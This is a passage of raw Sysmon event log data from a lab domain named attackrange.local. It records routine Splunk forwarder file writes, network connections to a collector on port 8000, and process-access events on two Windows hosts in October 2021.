Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D37B7D5A5E3B8A1A373721CAF677172B,SHA256=4AEAEDC5B8F082395C0544AFA6D3DAD93676AF143FAC8B583861E261F424B8EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082327Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:49.365{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=813F5CDEE2E5290EBBED80B2AE6EAA12,SHA256=5201FFF725755982D277E6CAB773CFE7308E85E14ED9D6BD84C495E6D42381CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104405Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:48.478{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49599-false10.0.1.12-8000- 23542300x800000000000000082328Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:50.365{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8235303DFF11236E201D7A4BC06AE14,SHA256=DC8CAF2BD4F064147AA35F33151C622E931867B75E7B5CF4352BB6B915DA22D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104406Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:50.050{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5D121BA68C82F43FB61CCEDF43C69A5,SHA256=C0A674C8CB29CCB39270B452B83A6FF91C2B727C8ADF22F988772603FA5620FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082330Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:49.605{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50089-false10.0.1.12-8000- 23542300x800000000000000082329Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:51.365{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D0EACB727D5650037938A72F1C742C0,SHA256=8256B484250090C46A6623D537D3B81E6379656F5D1F0FFC159A1AE16A8F8426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104407Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:51.065{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB7265623EFD0AD97E16516BDBFC00F3,SHA256=BE241A37D38992C98B16AAE1B297161812A2DCAF96C10615AFD2DE461F450B44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082331Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:52.568{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56B1570F167ACCCA9BFC853D481BC9A4,SHA256=77DA1F993DD7A16EF99D24FA5900DEAF2B210CD353B21DF63C15EF5365E9C990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104408Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:52.065{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94A83297CEC24EE48530DE56225C4425,SHA256=B222B2BB1CEF3A464D194187D7377AF466AD80BD03D062B956EE06203612840D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082332Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:53.568{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFF7B60D6CAB266B009DD6AB6C904629,SHA256=EF268E2A4BF72C82A5F0B863155FE7E7A436C3691774A4BC08FCAF9DD40423FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104409Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:53.096{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEC68541FDB6BF772B777FF6B3D016BA,SHA256=9D24FB95BD8A8C462EFB242F351649DF0D6EF9BBB3EB5E06DE1568208452F19E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082333Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:54.568{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3649F7B97A03E82CEAD99D4AE315A54,SHA256=FBFEC098E1364D7F0FDE74C65C7070D9524542115E621FC79AB76ADCB0DC1931,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104410Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:54.096{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C70C2095513241B0A85743EFFAE4BA0,SHA256=EC5A55979D354C381AA40F3A572CF8F96DC3711DD115DDB76B8BA95C9BEF135A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082334Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:55.568{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EAC5A3BCD67CB338C852983F8EF18DC,SHA256=27B7A03B6E060AB285E63011911E2590E2A01DB40C7B1399C490E3C14EA87EF3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104412Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:54.260{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49600-false10.0.1.12-8000- 23542300x8000000000000000104411Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:55.112{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C56DBEB4038169FBA76484ADAAA600BD,SHA256=7C439C00DB93BB3435EEF766CEF992BF873C7EF4860ED42B2F8EF15DEE5DEBAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082335Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:56.572{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=596F09DFF786E0594E27E9B752968E3E,SHA256=2D2D480DB056F0BA0768108D3564FF012D8D7AC649F2AA16D14A4F5138734F58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104414Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:56.897{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104413Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:56.116{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EDB87A646A0BD47AEFA6C3163E57774,SHA256=88E0820523E814547B0DE85DC6D963E1F5AF16B240C1F2A4B80D34697B128622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082336Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:57.603{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B1D15DB278880F5DA9BE7CD1047AF6C,SHA256=80264D8892D019CE24855833685C8A20424845842620988B4AB9F598A07EFEA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104415Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:57.116{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=460DE0FA44462B05775CFCCCAB4807FE,SHA256=7EBB699308EBB3D5DD88FF3F619D13914EB5BD686B3EE2A539337772BFD25E3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082351Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B38E-615A-6B01-00000000FD01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082350Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082349Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082348Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082347Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082346Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082345Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082344Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B38E-615A-6B01-00000000FD01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082343Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082342Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082341Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082340Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.978{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B38E-615A-6B01-00000000FD01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082339Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.979{2FDD8D40-B38E-615A-6B01-00000000FD01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082338Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:58.603{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=546CD585D1EC536861102ABAA32F0958,SHA256=91277DFB651A642FF8291C4B0AA7FBD80116302C9DBDD2838BDD02CD0EEE95F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104424Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.585{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B38E-615A-F001-00000000FC01}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104423Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.585{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104422Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 